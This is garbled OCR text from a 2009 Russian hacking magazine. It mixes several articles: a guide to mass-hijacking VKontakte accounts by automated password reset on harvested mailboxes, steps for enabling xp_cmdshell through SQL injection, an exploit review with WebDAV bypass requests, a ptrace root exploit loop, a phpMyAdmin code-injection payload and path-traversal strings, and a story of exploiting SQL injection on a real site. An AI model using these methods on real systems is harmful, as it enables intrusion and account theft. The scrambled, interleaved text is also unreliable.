limited uplcad r~te (kВIs): o OisO!lbIe ОНТ whEn tuming off мендую тебе статью "Интернет на ОДНОЙ странице» из 11 О
limit~d dO·....ТlloO!ld r~te (kB/-s): номера I (РDF-версия будет на нашем дискеl.
v
.
';:::::
1
,
I~~--._--.J
C{F 00 G&
Add Start Pause Remove Pгopeгties
~
'~
Active QOYJnloading S,eeding faused
~~,-~~,
:O't!'.ti'
tO....."""" ~,~.b'I'
D kuЬuпtU-9.04-dеsktор-аmdб4.isо
694,7 МВ, uploaded 3103 кв (Ratio: 0,00)
~R·~·~~РУБАдЛяГРАББИНГАЛИНКОВНА
СВЕЖИЕ СЕРИИ ПОПУЛЯРНОГО СЕРИАЛА 1,· . ,
ку на обновление, скармливая появившиеся торренты на мапо, В России трафик чаще режут на уровне организации,
скачку кnиенту Доступ к зтой папке был у моих друзей, и чтобы сотрудников не сипьно баловать халявным инетом,
они очень просто могли 80СnОnЬЗ0ваться моим каналом, Обойти такие ограничения не просто. но можно, Достаточно
просто скопировав в эту папку нужные торренты, а потом очевидный способ - сделать так, чтобы провайдеры не
спить закачанные файлы по специально открытому для могли разобрать, какие данные и каким образом переда
них ПР, ются пользователем, Трафикдля этого можно пустить через
Чуть позже ПОЯ8ИЛСЯ дедик на винде и оказаnось, что шифрованный туннель, но это зачастую дорого [например,
автоматизировать это можно прямо средствами uТоггепt, в сnучае nnaTHoro VРN-сервиса) иnи медленно [в случае • о том, как само
Надо лишь в разделе "Другие настройки» включить опцию беспnатного варианта на базе Toro же Тог'аl Однако в ~~y поднять С80Й
«Автозагрузка файnов .tоггепt» и задать папку для загрузки нашем сnучае необяза-rеnьно решать пробnем «в лоб», торрент-трекер, ты
Правда, по умолчанию клиент наЗОЙnИ80 будеттреб08ать Возможность шифрования трафика на основе простого ~~ожешь прочитать
путь для сохранения закаЧи8аемых фаЙЛ08, но и зто можно апгорип~а RC4 появилась в самих кnиентах Шифрование 8 #114у POF-куСО
побороть, указав нужную папку 8 попе "Помещать загружае протокопа IPгotocol EncryptlOn], впервые реапизованное статьей мы выложили
мыефайлы в», Чтобы не спутать старые файnы с новыми, все в проге BltComet еще в 2аО5 году, теперь поддерживается на диске,
обработан н ые торренты uТоггеп! помечает расши рен ием г,рапически всеми клиентами и включается без лишнего
,torrent,Loaded, геморроя устаН08КОЙ нужной галочки в настройках, Если • Раз уж мы за 1'080
взять UTorrent, то шифр08ать трафик он умеет 8 нескольких рипи о веб-оболочках
ОБХОДИМ ЗАЩИТУ ПРОВОВ режимах. для всех подключений, только для входящих, для упра8ления
Колоссальны й объем трафика, про качивае~шй через тоnько для исходя щих И Тд, закачками, не могу
BitTorrent, конечно, не СИЛЬНО нравится провайдерам, Реально обойти и другие ограничения, Если корпора не упом~нуть раз
В н екоторых странах п ровы охотно начина ют бороться с тивный файрвоn режет трафик по конкретны м портам, работку TorrentFLux
р2р-сетями и ограничиваютсоединения, ссылаясь на то, то в кnиенте можно попробовать установить другой порт. [torrentflux,com]
что через торрент [8нимание l ] может передавать варез, В конце концов, тот же uTorrent отлично работает через Это торрент-клиент,
LАМРхоетингпод
никсами
• Привыкнув
К uTorrent'y, сложно
перейти на альтерна
тивные кnиенты под
другими ОС Приятно,
ДМ это й програ~~
эмулятором Wine,
Easy Easy
Hack Hack
ХАКЕРСКIИЕ
Eas
Hack
разить в список ТИ па логи н :пароль ОТ "ВКонтакте» 1 Ре шение есть, и сейчас з. ':IeKael'1 мыльники на валид
ятебе его представлю. Для осуществелния задуманного мы воспользуемс~ 4. Валидные МЫПЬНИКИ чекаем на наличие акков <'<ВКОНТакте)о)
утилой MailWok, которая предназначена для проверки мыл на наличие акков 5. Ждем HeCKOJJbKQ l"4И.Н)"Т (пока на мыла рассыпаются письна С JЭос
"в Конта кте», а та кже для автоматического восста новления па рол ей и их СТдновлеННЫJoВ1 пассаии от социальной сети)
сбора с прочеканных ящиков. Прежде чем перейти к активным действиям, б. Теперь жнем на баТТQВ <~Проверить мыла» и Бдем, пока тулза
• Автоматический запрос на восстановления пароля от аККдунr:rа Теперь о возможных проблемах l Если пасс от "ВКоптакте» не пришел, зпачит:
«ВКонтакте»
• Автоматический сбор писем с паролян:и от «ВКонтакте» с проче~ 1. Мыло не лрочекано на валид либо невацидаое
пароля
• Поддержка ПОП'.fлярных почтовых сервисов {mail.ru, rambler .П], Как видишь, все довольно просто, но зффективно При наличии времени,
уапdех.ru, есс) желания и большой базы мыльных акков ты запросто сможешь собрать
целую 5Д с учетками от w\I'iw.vkontakte.ru. Однако не забывай, что за все свои
Если ты до сих пор не понял, о чем речь, то имеетсмысл ознакомиться с под действ и я ты отвечаешь сам, а испол ьзо ван ие '1ужих аккаунто В кате гор ич ески
Если ть! фанат iRC, то раскрученныL:\ капал С обилием народа, ДЛR тебя жизни TBOe'I'O канала сочтены}
дело '1ести. Воттолько собраl'Ь внушительное количество людей не так-то При желании дропнуть чужой канал - достаточно rrpо:инвайтить
просто Можно, конечно, рекламировать свой IRС-канал всеми возможными ники со служебlШХ каналов :)
способами, однако есть гораздо более эффективный метод, о котором я
тебе сейчас расскажу. Суть его заключается в автоматической рассылке Пла вно перейдем к установкескрипта:
ин вайтов и попол не нии численности ка наЛОflдселен ия за счет в ключен
ного автоджойна при получении инваЙта. Ка к ты понимаешь, речь идет об 1. Сливаем скрипт с нашеrо ДВД
автоматизированной доставке приглашений, поэтому знакомься -«Invlte 2. О'гкрываен mirс-редснстор СКрИПТОВ (aka
т;гс script Ьу elimS". Именно он поможет нам осуществить задуманное. Итак, <Alt +R»
начнем с описания функциональности скрипта. ! _ _.__ _...•:=::J з. СОЗДд.ем новый Сl\РИПТ Iс содеРЖИМbh"j
----------------------------------------~----------+
ХАКЕР 06 /126/ 09
» В::ЛОМ
Далее необходимо сконфигурировать скрипт Для этого: которого следует собирать ники (н" '!'вое усмотрение)
1) Канал - канал, на который будем приrлашать TBer.Horo н",к-писта для р"ссыпки инвайтов
2) Частота инвайта - цифра в милисекундах (1 секунда = 11( мили 6) НИК-ЛИС'Т' :ИСJ<лючений перечисляем НИКИ, KO'l'OPbl€ не будем
секунд) . Не .забудь, '{то на каждом сервере существует свой лимит лриглаШд:ТЬ на канал
З) Величина канала - :минимальное количеС'Т'ВD людей на канале t С СЛИ8ай СКР'1Птс нашего диска.1 приступай К раскрутке собственного канала.
Lide
ЗАДАЧА: УСТАНОВИТЬ И НАСТРО Web Obrazky Video JCQ.c:om
итыаснАтT
РЕШЕНИЕ: Номе
•.• m"lт1 p1iT' _ _. . . . .
3 одном из прошлых выпусков:У.: мы выкладывали на нашем диске
замечательную софтину ICQChal Но подробный мануал по настройке
тулзы ОТСУТСТ80вал. что вызвало немало вопросов. ЧТО Ж, пришло время
[aJ
Chat Rooms
"справить досадное недоразумение и расста8ИТЬ все по СВОИМ местам
lоехали J
Для того чтобы сме нить адм инский аккаунт, нам необходимо: Юзаем ICQChat
раSS">аdmiп</епtrу>
Найти ф"й.~ j iшЬоt. хт1 Вот и все. Надеюсь. проблем с дал ьне й шей эксплуатациейчата утебя н е
Отредактировать строку, kеу=»mаiп, StartHTTP»>tJ;ue< возникнет
РЕШЕНИЕ:
Саксы нужны всегда и 8езде:l
ОДН им ИЗ лучш их соке-серверов по пра8У считается Зргоху
ПОЭТОI~У сейчас мы подробно рассмотрим его установку из портов на
базе ФрRХИ Устанавливаем 3ргоху
ii cd !USJ;!poJ;ts!netl3proxy/
Теперьсоздаем конфиг: Далее откры вай м но гострадал ьны й конфиг Эр roxy.cfg и редакти руй по-своему
усмотрению [прv.мер правильного конфига ищи на DVO).
# ер /usr /10саl/еtс!Зрrоху,cfg _samp1e /usr /lоса1/еtс!Зрrоху.cfg Все, установка закончена Запусхаем Зргоху на сервере в качестве дe~~OHa:
При необходимоcrи - пишем логи в созданную диру: ff /usr 1l0calletc/rc. d/3proxy start
# mk:dir /var 110gI3proxy Хттп-прокси И сокс-проксикК твоим услугам - пользуйся и не забывай про
лог и -1.
Вообще, peKOMeHдyeTC~ пускать вселоги по прямому назначению - в/dеv/пull J
раgеЕпсоdiпg~"ПТF-8"%>
ЗАДАЧА: ВЕСТИ УЧЕТ РАБОТЫ TARGETS - храни~' информацию о конкретной исследуемой машине (IР
Существуетспециальныйпэтч, назыаемыыйпmарsqL(SЩlгсеfогgе.пеt/рГОjесts/ RUNLIST - содержит Hser 10, да'IY 11 время ВЫЗОВд. Nmap. Соответс
nmapsCJl]. Он добавляет подцержку работы с МуSQLдля хранения результатов твеН:НО 1 информация о поль~ователе читается из lеtс/раssт",1d.
сканирования. Это позволяет осуществлять удобный анализданных, ВЫПQЛ PORTSTAT - таблица с результатами сканирования и информацией О
нятьсортировкv. и выборки и3той кучилогов, которые могли бы хргниться как каждом порте (open/c1ose/fi1tered)
обычные текстовые файлы на выходе. Патч заточен на использование под Uп\х1 HOSTSST.'\T всевозможного рода статистическая информация, вро
Liпuх-окружением, позтомуотнесись внимательно к его настройке де общеrо количества просканированных ХОСТОВ/ портов и Т.Д.
+--------+-------+
N
iI
07,1
[tШ1]
ЗАДАЧА: ВКЛЮЧИТЬВОЗМОЖ
НОСТЬИСПОЛНЕНИЯКОМАНД
ОПЕРАЦИОННОЙ СИСТЕМЫ
~:=~~QdogoЩlon
~'::.'::."Z=::.~
~~'"'..-..4
...."'- ............_ ....... ч- •. -.... __ ..
... <~_·._
а_ . .
"~:.:I ''''''~~''''''"~
- ,
И СКРИПТОВ ACТlyEX
AUTOMATIO N SQL SERVER 2005
РЕШЕНИЕ:
~ ..~.
L-. ---=''''-=====:>!
большого количества системных хранимых процедур Доступ i< ним поз
xp_cmdshell по умолчанию НужГ'ые процедурыактивированы
воляет взаимодействовать с оп ерационн ой системой от имени учетной
Г'едоступен
I
этими процедурами требуется роль sysadmln q не раз сталкивался с при
ложен иями, работающими от имени 5а, так что это гlетакая уж и редкость,
4. Вкnючаем поддержку oLE АLJtоmаtiоп:
Проблема в том, что Mcrosoft в целях повышениябезопасностиотключает
I
доступ к этим функциямВ конфигурациисервера по умопчанию,Активи sр_сопfigurе 'Ole Аutошаtiоп PrOCedtlres 1,1
ровать процедурыможно, испопьзуя инструментарийSOLSLJrface Агеа
I
Сопfigшаtюп, Однако понятие о безопасности у парней из Мiсrоsоft всегда
I
доступ к этим процедурам удаленно с испоnьзованием средств
1. Активируем расширенные опции конфигурирования.
T-SQL. reconfigure
I
Объединяем запросы, разделяя их симовоnом ';', добавляем комментарий
I ехес sp_configllre 'show advanced options' ,1 и внедряем через инъекцию! Теперь можно наспаждаться прак-rИ'1ески
I неограниченным доступом к серверу. Ну а что делать дальше - зависит
f
P.S. В SOL Server 2000 xp_cmdshell также можно активировать, используя
I
1 reconfigure процедуру sр_аddехtепdеdргос.
I
IN 81 --
о
_
ЗАДАЧА, УДАЛЕННО8ЫПОЛНЯТЬ
- и получить на i3bIxoAe пароль поnьзователя \но в случае NT хеша $\./\·/inexe -U Admin \\192,168.0,1 "ipconfig"
» В::ЛОМ tЬ
Jj ОБ3'ОР
зксплоuтов
~
ОБ='ОР
зксплоuтов
~ ~ ~
1\
ill ~ Jj ОБВОр
зксплоuтов
~
~ ~ ~
оsзор
~
3КСПЛQUТОВ
ОБ3'ОР
зксплоuтов
/[]~~[!J~/EKSPLOITOV
Летняя пора - время отдыха. Как бы ни так, когда речь идет об уязви
мостях! Соревнования между«злоумышленником» и «защитником»
[применительно к нашему времени - междухакером и вендором) про
должаются. Число брешей неизмеримо растет К сожалению, все осве
тить никак не получается, поэтому в этот раз я подготовил на обозре
ние наиболее важные.
01 В МIСRОSОFТ115 6.0
WEBDAV
к файлу относительно самого хоета: sесгеthоst.гu/sесгеt/sесгеt.ziр. Для
обхода огран"чений посылаем GЕТ-запрос вида:
Изюминка зтого класса атак в том, что возможность «забрать» искомое с 'I'rапslаtе: f
насти ресурса. WebDAV IWeb-Ьаsеd Dlstributed Аuthопng апd Vегsiопiпgl Host: secrethost.ru
MOVE - то же, что и предыдущая, только перемещение в отчетпридетсодержимоезащищенногообъекта. даже если дирек
LOCK - поставить блокировку на объекте. WebDAV поддержи тория. в которой он располагался,была защищенапаролем. Можноли
вает эксклюзивные и общие (shared) бпокировки сделать что-либо еще? Смотри описание запроса PROPFIND - с ним
UNLOCK - C'blTb блокирсвку С ресурса можно получ"ть структуру какой-либо папки. Если учесть, что, ИСГIОЛЬ
Host: secrethost_ru
в
здает 115 по дефолту В ней лежит файл secret.zip, пр" этом директор"я Depth: 1
Con~ent-Length: 288
230 Ьад:
Content-Type: application/xml
231 'tlrite_un10ck_irqrestore (&task1ist_10ck,
</prop></propfind>
236
«НКЕУ_LOCAL_MAC Н 1N E\5Y5TEM\Cu ггепtСОПlгоL5еt\5егviсеs\WЗ5VС\ вместо процесса. который должен Быьb отслежен. воэникаетситуа
Parameters»: ция «гонки» вовремя исполнения какого-либо процесса и неконтро
лируемого обращения к SUIO,
Value пате: DisabIeWebDAV
Value data: 1
mit",/Orm,com/expLoits/8678
другие отключены, Такой подход может стать временным устранением gcc exploi С,. с -о exploit
02
24 12:03:21 UTC 2009 i686 GNU/Linux
ПРИВИЛЕГИЙ В GNU/LINUX KERNEL
2.6.29 # while '/biD/true/';do ./exp10it;done
[, .. much scro11 removed, go та 1 ,е coffee, get а job.
Imm до something ~~'hile rUnIJing ... ]
Пробле,~а вызвана функцией «ptrace_attach О» [kernel/ptrace,c] и * /dev/sda1 оп / Суре ехСЗ (rw,relatime,errors=remount,
использованием«current->cred_exec_mutex» вместо «task->cгed ro)
exec_mutex», - все это может позволить злонамеренным пользова proc оп /proc type proc (r\'l. rюехес ,nosu id, node")
телР.м получать привилегии рута с помощью совместных "ptrace О» И /sys оп /sys type sysfs (rw,noexec,rlQsuid,Dodev)
«ехес 1)>> вызовов, Код уязвимой функцVoИ представлен ниже: varrun оп /var/rUrJ type tmpfs (rw.поехес,rюsuid,поdе
У,тоде=0755)
181
.... ...
183 lf (same_thread_group(task, current»)
е х . гт_---....-.:о--- __ ;-:7р:;...... ~ '$
187
188
agains~ our in~erference; SUID, SGID
creds ge;: determirled diEEerently under ptrace */
апд :,s~r
~=-_."~ ~:=~=~~:"~" . . ,w.~."
['-~ -- '.~~.~.-_._~
¤t->cred_exec_mutex);
=~'M·""
191 ge>toout;
192
194 repeat:
I .\(:. " .
.. _ . • __...... 0 • _ _ ._..: 1_ _ r"' __ 1 ~ __ a,_""_(\ _ _
",.. _...... _,__- ...... ...-._...,.,. ,, _
~
-
"
'
:
'
"
:
a
-
_
~
,
~~~~eport [О: n:;ТtJоt:ramt::СIUIТtШRun())
.. -- .........
..,.~_.""
~~'
~~ §~=~_. =::--"=~
__ и.
~"AJ:I
_- -
_
...... _,....,JII
1.'1
--- ~~"".ш
•
~Ua.:.,:.J
_,,<:o~
'(
~
..... --[
..
...
. 1»\
g'Tfs-fusе-dаеmоп ол /home/matttlew/ ,gvfs type ЕаБе, 3507 / / / / the textrun' s text !1йУ Ье rеfеr'еnсiпg а DOI,1
gvfs-fuse-daemon (rw,nosuid,nodev,user~"atrhew) поdе ёЬа t has changed,
[ I'ПN! 18281 3508// // SO ",e'd betteI' kill this textl-UТJ по".
44 (v1deo) ,46 (p1ugdev) ,107{fuse) ,109 (lpadmin) ,115(ad 3512 / / de1 .te cextEUIl;
3514 / /
тРаёЬ rPath Linux 2 3517 / / Eemove i~ гюи ЬеСдиве it' s лоt. cJoing
3520
ИЬМФffi 3521
О3
MOZILLA FIREFOX
также содержитошибки. Ошибка в том, что mTextRurJ может содержать
MEMORY
некорректные флаги от предыдущих операций, - это при ведет к некор
CORRUPTION
ректн о му удален ию [3519) Из-за подобн ых соображе н v\и разработч ики
3494 \1Оiд
"'tftФIO
3495 nsTextFrame: : СlеаrтехtR\.lП ( )
Код эксплоита приведен ниже.
3496
ХАКЕР 06/126/ 09
ОВ
ОЕа0Р
3КСПЛОIJТОВ
ОБ30Р
3КСПЛоIJТQ8
ОБ30Р
3КСПЛОIJТОВ
»
Fonn_ ..........
F:.rmTIt1e: "",bl",,[:lJ6
[~Ь@"
5...... • О
AuLl':orA~:
Мninш10r ~-6
ТittyMCEli;l\t Orw=
_. ~ О
O(O!fe<1f<;<Ы ••,,} ~ О
Rio..·rrit3:I:re~fdd.i:te:
'.9!rg.-ll.J.D 00;00;00 _",JO
P,,;!;{'$h и;<,: _
19~11--3000:00:00 ---=.JO
PlJЬ!М\Di:м:n:
N8NИ _---=.J6
10:
VU?EN
10 class ConfigFile
11{
I.oc.Wffl~:'r~
php
~*и D~; m·IЗS·04
14 * @var array
15 */
;:, ~lIl~ra!!ГП1' 1Ia, !Ittл иrr,!lItd I!I ~ Ktrn~, "h;dI arJd Ье щ-/о;~ ~~ J loJCaI3ttad:~ Ь ~;a, r'!le:~пd
16 private $cfg;
~~t9CS. Ths i:lW! i$ cMt'd d~'f t;I) l1!t 'ptт~_ ...'t«Ь(J' l~arndlptrbC:'.L] h!i'l::IIX, .щ
·!7,,!:t:it-:С'd,шс_:-:,~:(mtj.d ·~"'o~·:Cиec_rr ....~t·. ~'1idJ (;1J:j,d ~ЩI m.ШJcш IISlJstп ~UI rnat
263 */
265 {
</htm1> 268
269 / / header
После исполненияуказанного кода происходитаварийноезавершение 270 $ret = '<?php' . $crlf
работы браузера.
279 // servers
IM6i;·blE 280 if ($this->gеtSеrvеГСоuпt() > О) (
MoziLla Flгеfохдо версии 3.0.10 281 $ret . = "/ * Servers configuration * !$cr1f\$i
= О;" $crlf. $crlf;
".t1mlfМj 282 foreach ($o['Servers'] аэ $id => $server) {
в новых версиях Firefox уязвимость своевременно устранена. 283 $ret . = • /* Server; . $this
>gеtSегvеl-Nаmе($id) . " [$id] */" $crlf
:::: «
Кто бы мог подумать, что во время установки Phpmyadmin мы 28'1 var_export ($v, true) . ' . ' . $cr1f;
можем произвести эксплуатацию кода' Рассмотрим вни~~ательно 288
сорец, использующийсяустаНО80ЧНЫМфайлом для формирования 289 $ret $crlfi
конфига: 290
ХАКЕР 06 /126/ 09
» в::лоМ OE;~OP
3КС;ПЛОUТОВ ::~:~M" ~ ~ ~ OE;~OP
3КС;ПЛОUТОВ
1\ '~
Dhgm'lаdmiп.svп.sоuгсе~t/\liеwvс/рhрmУ<Jdmiп?viеl'l-геv&гevis
iоп-12342 .
• ph р myad m i Il.5VIl.SO U('cefo 1'9 е. net/viewvc/ph gmyad m i n ?viеw-геv& гevis
iоп~12З48.
РАСКРЫТИЕ ПУТЕЙ
05 BZERVIТ
WEBSERVER 4.0
fmШj.
~fti:t~1:~~~~~~~~~1
. $crlf $сгН;
Web-сервера.Для подобныхатак потенциалы,оуязвимолюбое
устройство,
292
имеющееWeb-интерфеЙс.Многие Web-серверbIограничиваютдоступ
пол ЬЗО8ателя оп ределенной частью файловой системы, обычно называе
Итак, функция getConflgFILe[1 В03враЩ<Jет всякого рода информацию мой «web docuгnent гoot» или "CGI гоо!}). Эти директории содержат файлы,
Здесь составляется конфигурационный файл. и $гet инклудит РН Р предназначенныедля пользователя, и программы, необходимыедля
код. На 281 строке мы видим комментарий, а затем еще один U* Seгver: получения доступа к фун кциям Web-приложения. Большинство базовых
<getSeгverNameO> «id» */1. Обрати внимание: выходиттак, что $id полностью атак, эксплуатирующих обратный путь, основаны на внедрении в URL
контролируется пользователем сразу, К<JКТОЛЬКО переменная была получена символов " ../}) - для того, чтобы изменить расположение ресурса, который
из сессии [267J. Скажем, если пользователь передаст ее установленной в будет обрабатываться сервером. Посколькубольши нство Web-серверов
виде "bLeh */ <?php echo date[J;?> /*», то тем самым он завершит конфигу фильтруют эту последовательность, злоумышленник может воспользо
рационный файл строкой «/* Seгver: <gelSeгverNameO>bleh */ <?phpecho ваться альтернативн ыми кодировками, например, Uпiсоdе [" ..%u2216»
dateO:?> /* */». или «.. %cO%af,,!. Другие популярные приемы - использование обратного
слеша k.\») в WlПdоws-серверах,символов URLEncode 1«%2e%2e%2f})1
о Y~le.ts) а J:lytes
~; HTTP/1.12D7Multr-st.tш
1 Dir(~1 2,178,79.,56:;) Ь~tеэ J::I:"ee
~~=:::~<=~;=~~:;;~~~:6:~~~~~%~~~~ [!
Ф:rмponse>Dф:hrеf>/tm/ <ID :hI"еf)[]ф ::рropstаt>Qф :prop>O
Ф:rf'Sоur<>etype.)ф :colk!c1ion/)</0 тesour~)О</D:pr09)ОФ:sU1us:>НТТР/1.1 200 OК<IO ::status:)
</r) :propst<tlt>(](/O :response>O<O nSl)Qf'lЯ>Оф :href>/maГJU.tl </0 :hrеf>DФ :prоpsut>[]Ф :prop>Q
Ф:r~ourсе~><О :collec1ion/><IO :resooroEotype){](ID:prop>D<O :s1а1us>НТТР/1.1 200 01«/0 :staw:P l.J
</D:props1аtю</о :r"'e'sроRS1'>{]Ф ~I!')(]<O ~f>lindм<:.htmI<1D kеf>QФ :propsW>D-Ф :ргор>(] ....
Ф :resoc.rc!'typI!'/></() ;p-ор>D<О :$Utus:>НТТP 11.1 2DO ок </0 :S.t.1W$)[]<1'D :pYops~t>[)</O :rt'sponsE'>[]
i
~ 046 ХАКЕР 06 /126/ 09
08
ОБ300Р
ЭКСnЛОUТО8
ОБ~ОР
эксnлоuтов
» B3:AOIY1
I~
Ш",. Namt:
· P"ss'W"ord:
*
Мetho41 РROPl"IIФ I J .
· . / .. / .. / .. / .. / , . / .. / . . 1 . . IProgram Files\i\.pache Group\
· Oestin,,'ion: Apache\conf\httpd.conf
· . / .. / .. / . . 1 . . / . . 1 . . / .. / .. /Ргоgrаш Files\Apache Group\
<?xml versIOfP"'.O" f1\Oodin9="uif-S" ?>
Apache2\conf\httpd.conf
t <propfind Xmlnf="OAY :") · ./ . . 1 . . / . . 1 .. / .. 1 . . / .. / .. /Prograrn Files\xampp\apache\
о(ргор>
~r.SOUl"o.typ./')
I conf\httpd.conf
ПРИМЕРЫДЛЯРАБОТЫ CWEBDAV МОЖНО НАЙ'ТИ,ЗДЕСЬ
(WEBDAV.ORG/GOLIATH/DAVEXAMPLE.HTMLJ 4.Логи доступа vo ошибок.
· .! .. / . . 1 . . / . . 1 . . / .. / . . 1 .. 1 . . /Ргоgгаш Files\!'.pache
2e%2e%2f - . . 1
Group\Apache\logs\access.log
%2е%2еl - . . 1
· . / .. / . . 1 . . / . . 1 . . / .. / .. / .. / .. /Prograrn Files\Apache
· .%2Е - .. 1
Group\Apache\logs\error.log
%2е%2е%5с - .. \
%cl%1c - 1 (иТР-8)
изБыочныыйсписок путей конфигов и наиболее важных для неавториэи
%сО%аЕ - \ (UTF-(3)
рованногопросмотрафайлов можно найти в подборке ettee 1~lпtiсhаt.гul
thread49775.htmlJ. В адваЙзори. которое было опубликованона mi(w()rm.
Некоторые ю представленныхвариантов платформозависимыи при ГО80РИЛОСЬо Метогу Соггuрtiоп по такой схеме:
годны далеко не на каждой системе.
import socket
Ф=tФm
Са ма эксплуатация состоит в посыл ке злонаме ренного GET -за проса: hos t = "127. О . О .1"
port = 8080
GET 1 .. 1 .. 1 .. 1, .1 . . /boot.il>i HTTPI1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; еп) try:
Presto/2.1.1 for i ;", гапgе(1,10):
HTTPI1.1 200 ОК
Рассматривая проблеt-1у ближе, приведу детальный анализ. почему же
Sелтег: Zervi t О. 4
так получается.
Connection: close
Accept-Range5: bytes
Http.h,
Content-Type: application/octet-stream
69 struct http_data(
Сопtепt-Lепgth: 355
70 SOCKET sck;
71 char file[512];
[Ьооl: loaderJ 72 char keep_alive;
timeout=30 73 char даса [2048] ;
default=mul ti (О) disk (О) rdisk (О) partition (1) \WINDOWS 74 char usег_аgепt[512J;
mull:i (О) disk (О) rdisk (О) partition (1) \WINDO"/S= "Microsoft 76 );
Windows ХР ProfeS5ional" /NOEXECUTE=OPTIN IFASTJ)ETECT Http.c:
13 void parse_ht tp (struct ht'l:p_data *"'5g5)
Естественно. Bt-1еетО обращениS'l к Ьооt.IЩ t-10ГЛИ бы быть' 14
1. Конфигурационный файл хоетинг-панели Срапеl-/vаг/срапеU
cpanel.config. 21 if(stгсшр(сh,"GЕТ")==О)(
ХАКЕР 06 /126/ 09
» Е:3ЛОМ
~////л
Х MORO Х MUXX
I MORO@INBOX.RU I 1 MUXX@BK.,RU I
КЛАССИКА
ПРОНИКНОВЕНИЯ
• ПРЕЛЮДИЯ, тихо и мирно. Итак, заветнаяфраза «iпsitе.ism Все оказалось настолькотривиально, что не воз
ИЛИ КАК ВСЕ НАЧИНАЛОСЬ WS», кнопка Search и ... можно считать, что дело никало ни 1'ени сомнения в успешностидальней
А начи налось все банально, Сначала был URL, сделано? шихдейст~ий Привычная сине-серая страница
Кому-то этот URL был почему-тоочень интересен. Порядка 10000 результатов oTGoogle обещали ошибки СоldFusiоп,представшаяперед глазами,
и надо было гл~нуть, что С liИМ можно сделать. кропотливую работу. Лис быстро обзавелся открыла взору и полный SQL-запрос, и тип
URLсразупопалклису, который быстро выдал вкладка~,и, в которые полетели вс~кие кав ычки, СУБД !SQL Sеrvег), и локальный адрес скрипта
результат: институтилитипатого,куча ссылок, равенства, дефисы и прочая нечисть. Вообще, информативность ошибок, выдаваемых
новости, меню и прочая лабуда. Мышь быст- Cold Fusiоп, просто поражает - даже полн ый стек
ро перескакивалапо ссылкам, и настроение ГЛАВА 1, вызовов. берv., не хочу. Инъекция найдена. пора
потихонькуподнимаЛОСI,.Мне всегда нравились ИЛИ ВСЕ МЫ ГРЕШНЫ приступать к внедрению.
сайты с большим количест80мзна КО8 вопроса, Практика показывает, что почти любой круп
параметрамитипаid и числовыми значениями ный ресурс имеет инъекции Хоть маленькая, ГЛАВА 2,
влинкаХ ... Аздесьихбыло, прямо скажем, не незр~ча~ и фильтруемая инъекция, но есть ИЛИ ДА ЗДРАВСТВУЮТ
меньше, чем мусора на свалках, наверняка. Надо лишь присмотреться. Вот и ОШИБИИ
Глянув на иконку любимого сканера и ухмыльнув здесьзаветный плод был найден по адресу Сервер БД он,елкомягкихвсегда поражал 803
шись, я решил все-таки ненапр~гатьадминов, h l tp :I!wwvo/. isrn .'ivs!Ap plica tiопs!Fогrns! можност~~,и Я не говорю О стандартах,которые,
а обратиться к Великому Индексу и решить все FогmОisрlау.сfm?Fогm I0-8464. В общем-то,все разработчикиСУБДтрактуютпо
._,. __
~ [)oo:t,<4 ~IJ. ~I, ~'_T .. IJ'~.
r:\дc,пaaW'!tl~!mI!II !> 5I!tIS<.o:\· . ' : . ~' '$I!II'&O: z:: . .". wt't::!':I. SC,"""Sl:r;, ,,!:!ot.
Tne web site you аге accessing has experienced an unexpected еггог.
;:
Please contact the webslte administrator.
'М,;!!,,,;;';.';
Щ4'Щ·§.$М§d5Ч #W!фU&'
'4"';; '&
1F.)тor Executinq Dabtbase Query.
ZE&~~.~§~-~':':#4!"!!!,,,!';!'i!'!!:::LJ:::::::.i8l1iiiiiiiliillliillili1!Ei!щ
fI14tr.",~.;T.XSQI.S."",'IOII(;O"""J(SQl.S."""<1tinl~;Z:[~00I'I'~e:t:H"''''~n'~' ...". 00-" \)0,0. '"".- _ ""'- ~
ClIlred INlm O;\lnc\il'ltl\llOCgmmon\crмa:(e\;'DDIic,aoons'lDublJcVom'Is·'O"If~ o ...>tIO· э .._· .,;t ..... :':I_ ... L_' 010"1''''''-'' _ _ о ,1... ·
. / _ . : : ......
~::::~
51 :
:;::: ~;~~:~~::::::::::=~~:::~:~~~:::~:~:~:.
III1.С"Е Т'. TeIOP1,,~e7Ypoe • 'ro,,,,'
The web slte you аге acremng has Qxperlenced ап unexpeeted error.
PleaSQ contat;t the websitli1i admiltlstrator.
и : ,,'--- »tD db" __ 1Vi~Y('$~~:;
~LfСТf\.·.Т.·,F.·,'Нf,l.к_
••• Нs.dеrl'.u..РТ2.f,:е
'п.SttOJO.Н2.s"otеJO.51-11.СfМо~рi"'iТоlndud
•••• Н ••d.
~~go~:~iт:~:I~~.~e~:s~~:::~~
~.:;'~~~:i·RR] :;\.': ~~,~~.~Т;:.~,--:\....--. .._,..........\ •• oII, .....,,'\... btI'\'О<1'n
'ОС
T.En\ittID_f.fnti!yIOlotIJOINPТ.Pro.eMoOti."Terтu>I
.....
PТ1.En~. . yIDlef'l:)QIt.lPТ_'~.cnt.,;onTemplЫosPiZenffo
' loIl.... "" О,\I .........яОС_.......-.--...~
e.1Io4"'-о,~.".r.c-.мo..........,.~.,.~
1.ltюln5м..$~.<sI'41OfIl'n.s~"lo_ SI'\1.S;~1D"NO 5" :~:::-.:::::~=::=:::::::==;~;=::=:~i~
__ \f~I.6n'w~r
.. _OV~r"""''"'
l
;i~~';~E~f T.Templbt"Тype ~ "0''''' ANOII,.E<М1 :~: :,:;-;.:~.:-;.;,:'f~·;:::::....,........,..•. t.Ш'1S~~.R.1' ... ",JDJ ~ 1
Io.aT"SOOR.CE
SQL.SТ"тt I<Y<.IOO
l'I..o ..... ~,
..
bl'I.LCTl.·.'.-.'.·.fnJ ,.. " ОТ: .• :Iof< ott,
~~:~~~';:i:~:~.t;=':.:~.:..:.>(~>o, ..
..
сl'l.~'m.O'I.I~ tfЖl~,II)-I.tw:oto~»1Nt1';J_
......
.
fl_II't_._"'_ ш."~ Т_ I... _'~""_
..
~!1 OOI'!ooQ'otIJUL.w·_ ' _ _ ""'DI_~lr ....
'~'I"_"'1~<'"I<\ ...
IoIIJoI1lC>'L&iooff.tIJ_~.~ID_·
•._(......
........ .$eo(O~~.~t"._
·"'.·.,t-..._ .... )I):'f$IO.$>In~or:,rn.3.МIО·:I"'l.~I,,_$"!~t ....
~·.II!.~'.'_.t;Н-l'_·aJ<tIl.t~"' ..
fT'OII ... __ .......-(, .... .... _ .. j·."................ II.""
""".-.о,
_er
